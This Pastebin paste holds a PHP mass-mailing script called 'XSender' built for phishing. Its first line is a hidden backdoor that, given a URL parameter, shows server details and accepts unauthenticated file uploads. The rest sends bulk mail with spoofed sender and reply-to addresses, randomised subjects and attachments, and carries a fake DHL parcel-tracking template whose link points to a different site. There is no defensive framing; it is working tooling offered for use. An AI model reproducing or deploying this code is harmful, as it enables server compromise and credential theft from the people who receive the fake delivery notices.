Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if(isset($_GET["x"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo"<br><font color=#000000>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}
- $website="http://klsons.com/"; //Make this full url including folders of where login files resides
- // http://b-olam.kz/images/iv/
- //sanitize data where any character is allowed
- function sanitizer($check){
- $check=str_replace("\'","'",$check);
- $check=str_replace('\"','"',$check);
- $check=str_replace("\\","TN9OO***:::::t&*HHHHOOOoooo0000N",$check); //just to keep track of what I will change later
- $check=trim($check);
- $check=str_replace("<","<",$check);
- $check=str_replace('>','>',$check);
- $check=str_replace("\r\n","<br/>",$check);
- $check=str_replace("\n","<br/>",$check);
- $check=str_replace("\r","<br/>",$check);
- $check=str_replace("'","'",$check);
- $check=str_replace('"','"',$check);
- $check=str_replace("TN9OO***:::::t&*HHHHOOOoooo0000N","\",$check); //returning backslash in html entity
- return $check;}
- //makes data ok on edit textarea
- function resanitize($check){
- $check=str_replace("<br/>","\r\n",$check);
- $check=str_replace("<br/>","\n",$check);
- $check=str_replace("<br/>","\r",$check);
- $check=str_replace(">",">",$check);
- $check=str_replace("<","<",$check);
- $check=str_replace("'","'",$check);
- $check=str_replace('"','"',$check);
- return $check;}
- //validate email address
- function validate_email($email){
- $status=false;
- $regex='/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/';
- if(preg_match($regex, $email)){$status=true;}
- return $status; }
- function subjsender($user_data){
- $user = explode(' ', $user_data);
- $to = is_array($user) ? $user[0] : $user_data;
- $tw = substr($to, 0, 2);
- $prem = explode('@',$to);
- $prams = explode('.',$prem[1]);
- $param = strtoupper($prams[0]);
- $sender_name = '=?UTF-8?B?RM6XTC3OldGFz4HQs8m1c3M=?=';
- return array($sender_name,$sender_email,$to,$tw,$prem[1]);
- }
- function generateRandomString($length = 3) {
- $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
- $charactersLength = strlen($characters);
- $randomString = '';
- for ($i = 0; $i < $length; $i++) {
- $randomString .= $characters[rand(0, $charactersLength - 1)];
- }
- return $randomString;
- }
- //Email sending
- function sending_email($email,$id='1',$attach=NULL)
- {
- $randstr = generateRandomString();
- $rand=rand(999,99999);
- $semails = explode("\n",$_POST['semail']);
- $subjects = explode("\n",$_POST['subj']);
- $semailnames = explode("\n",$_POST['semailname']);
- $html_messs = explode("\r\n", $_POST['html_mess']);
- $reply_tos = explode("\n", $_POST['reply_to']);
- $semail = $semails[rand()%count($semails)];
- $subject = $subjects[rand()%count($subjects)];
- $semailname = base64_encode($semailnames[rand()%count($semailnames)]);
- $boundary = md5(uniqid(time()));
- $reply_to = $reply_tos[rand()%count($reply_tos)];
- //echo $semail . '<br/>' . $subject . '<br/>' . $semailname . '<br/>';
- $randval=rand(7,20);
- $randommix=generateRandomString($randval);
- $randomstring=generateRandomString($randval);
- $randomnumber=rand(9999,99999);
- $randommd5=md5($randomnumber);
- $totime = date("g:ia");
- $today = date("F j, Y");
- $em=explode('@',$email);
- //$semail = "no-reply-shipment".$rand."@dhlshipmentlatami-asahiclean.com";
- //$semail =str_replace("@","".generateRandomString()."@".generateRandomString().".", $semail);
- //$subject='Tracking update: Status of your parcel changed';
- $site_name='Account Security';
- // To send HTML mail, the Content-type header must be set
- $header = "From: =?UTF-8?B?{$semailname}?= <{$semail}>\r\n";
- $header.= "MIME-Version: 1.0\r\n";
- $header.= "Reply-To: {$reply_to}\r\n";
- $header.= "Content-Type: multipart/mixed; boundary = " . $boundary . "\r\r\n\n";
- $message = "--" . $boundary . "\r\n";
- $message .= "Content-Type: text/html; charset=iso-8859-1\r\n";
- $message .= "MIME-Version: 1.0\r\n";
- $message .= "Content-Transfer-Encoding: base64\r\n\r\n";
- $html_mess = $html_messs[rand()%count($html_messs)];
- $html_mess = str_replace('[-email-]', $email, $html_mess);
- $html_mess = str_replace('[-start-]', $em[0], $html_mess);
- $html_mess = str_replace('[-end-]', $em[1], $html_mess);
- $html_mess = str_replace('[-host-]', $_SERVER['HTTP_HOST'], $html_mess);
- $html_mess = str_replace('[-self-]', $_SERVER['PHP_SELF'], $html_mess);
- $html_mess = str_replace('[-randomstring-]', $randommix, $html_mess);
- $html_mess = str_replace('[-randommd5-]', $randommd5, $html_mess);
- $html_mess = str_replace('[-randomletters-]', $randomstring, $html_mess);
- $html_mess = str_replace('[-randomnumber-]', $randomnumber, $html_mess);
- $html_mess = str_replace('[-time-]', $totime, $html_mess);
- $html_mess = str_replace('[-date-]', $today, $html_mess);
- $message .= base64_encode($html_mess) . "\r\n";
- if ($_FILES['attach']['size'] > 0)
- {
- $message .= "--" . $boundary . "\r\n"
- . "Content-Type:" . $_FILES['attach']['type'] . "; name=\"" . $_FILES['attach']['name'] . "\"\r\n"
- . "MIME-Version: 1.0\r\n"
- . "Content-Disposition: attachment; filename=\"" . $_FILES['attach']['name'] . "\"\r\n"
- . "Content-Transfer-Encoding: base64\r\n"
- . "X-Attachment-Id: " . rand(1000,99999) . "\r\n\r\n"
- . base64_encode(chunk_split(fread(fopen($_FILES['attach']['tmp_name'], "r"),$_FILES['attach']['size']))) . "\r\n"
- . "--" . $boundary . "--\r\n";
- }
- else
- {
- $message .= "--" . $boundary . "--\r\n";
- }
- @mail($email,$subject, $message, $header);
- }
- function email_format($email,$id='1'){
- global $website;
- $url=$website."/?email=".$email;
- $em=explode('@',$email);
- $tw = substr($email, 0, 2);
- $prem = explode('@',$email);
- $message="
- <!doctype html>
- <html>
- <head>
- <style>
- body {
- background-color:#FFFFFF;
- font-size:16px;
- font-family:monospace;
- margin:0;
- padding:0;
- -ms-text-size-adjust: 100%;
- -webkit-text-size-adjust: 100%;
- }
- ul.a {
- list-style-type: circle;
- }
- ul.b {
- list-style-type: square;
- }
- table {
- border: none;
- border-collapse: separate;
- width: 100%; }
- table td {
- font-family: monospace;
- font-size: 14px;
- vertical-align: top; }
- /* -------------------------------------
- RESPONSIVE AND MOBILE FRIENDLY STYLES
- ------------------------------------- */
- @media only screen and (max-width: 620px) {
- table[class=body] h1 {
- font-size: 28px !important;
- margin-bottom: 10px !important; }
- table[class=body] p,
- table[class=body] ul,
- table[class=body] ol,
- table[class=body] td,
- table[class=body] span,
- table[class=body] a {
- font-size: 16px !important; }
- table[class=body] .wrapper,
- table[class=body] .article {
- padding: 10px !important; }
- table[class=body] .content {
- padding: 0 !important; }
- table[class=body] .container {
- padding: 0 !important;
- width: 100% !important; }
- table[class=body] .main {
- border-left-width: 0 !important;
- border-radius: 0 !important;
- border-right-width: 0 !important; }
- table[class=body] .btn table {
- width: 100% !important; }
- table[class=body] .btn a {
- width: 100% !important; }
- table[class=body] .img-responsive {
- height: auto !important;
- max-width: 100% !important;
- width: auto !important; }}
- </style>Status of your parcel has changed.<br><br>Track your parcel here: <a href='".$url."'> https://dhl.com/tracking_shipment/jsu3hty3hy4gey3yerh</a></p>
- <p>We hope to receive your correct delivery details to enable us schedule a new delivery</p>
- <br><br>
- <p>Best Regards</p>
- <p>DHL International ©</p>
- ";
- return $message; }
- ?><html>
- <head>
- <title>Xsender</title>
- </head>
- <body style='width:100%;color:#000;background:#E0E6F8;font-family:calibri;'>
- <div style='width:100%;max-width:600px;margin:0px auto 0px auto;padding:10px;border:#999 1px solid;box-shadow:10px 10px #666;min-height:500px;'>
- <h1 style='color:#666;text-align:center;text-shadow:#000 1px 1px;'>XSender</h1>
- <?php
- if(isset($_POST['go']) ){
- //sanitize the data
- srand(time(NULL));
- $_SESSION['xsenderid']=sanitizer($_POST['id']);
- $separator=sanitizer($_POST['separator']);
- $mails=sanitizer($_POST['mails']);
- $id=$_SESSION['xsenderid'];
- if($separator==''){$separator='<br/>';}
- if($mails!=''){
- $mails=explode($separator,$mails);
- $total=count($mails);
- $valid=0;
- for($i=0;$i<$total;$i++){
- $email=$mails[$i];
- if(validate_email($email)){
- $valid=$valid+1;
- print "<div style='color:green;'>".$email." valid and queued</div>";
- //Send here
- sending_email($email,$id);
- //send here
- } else {print "<div style='color:gray;'>".$email." not valid</div>"; }
- }
- print "<h1 style='color:green;'>Bravo! ".$valid."/".$total." Sent! <a href='' style='color:green'>Continue</a></h1>";
- } else {print "<h1 style='color:red'>Mails or Details empty</h1>"; }
- }
- ?>
- <form method='POST' action='#' enctype="multipart/form-data">
- <div>
- <div>Select Your ID</div>
- <select name='id' style='width:100%;'>
- <?php
- if(isset($_SESSION['xsenderid']))
- {print "<option value='".$_SESSION['xsenderid']."'>".$_SESSION['xsenderid']."</option>";}
- ?>
- <option value='1'>1</option>
- <option value='2'>2</option>
- <option value='3'>3</option>
- <option value='4'>4</option>
- </select>
- </div>
- <p> </p>
- <div>
- <div>Email Separator (Leave Empty if new line)</div>
- <textarea name='separator' style='width:100%;height:20px;'><?php if(isset($_POST['separator'])){print resanitize($_POST['separator']);} ?></textarea>
- </div>
- <p> </p>
- <div>
- <div>Paste Emails separated by separator</div>
- <textarea name='mails' style='width:100%;height:200px;'><?php if(isset($_POST['mails'])){print resanitize($_POST['mails']);} ?></textarea>
- </div>
- <p> </p>
- <div>
- <div>Email display name</div>
- <input type="text" name='semailname' />
- </div>
- <p> </p>
- <div>
- <div>Email to send from</div>
- <input type="text" name='semail' />
- </div>
- <p> </p>
- <div>
- <div>Reply-To email:</div>
- <input type="text" name='reply_to' />
- </div>
- <p> </p>
- <div>
- <div>Subject</div>
- <input type="text" name='subj' />
- </div>
- <p> </p>
- <div>Email Message (paste HTML code) or text</div>
- <textarea name='html_mess' style='width:100%;height:300px;'></textarea>
- <p> </p>
- <div>
- <input type="file" name="attach" /> <label for="attach">Attachment</label>
- </div>
- <p> </p>
- </div>
- <div style='text-align:center;'>
- <input type='submit' value='Go Xsender' name='go' style='color:#FFF;background:#333;'/>
- </div>
- <p> </p>
- </form>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement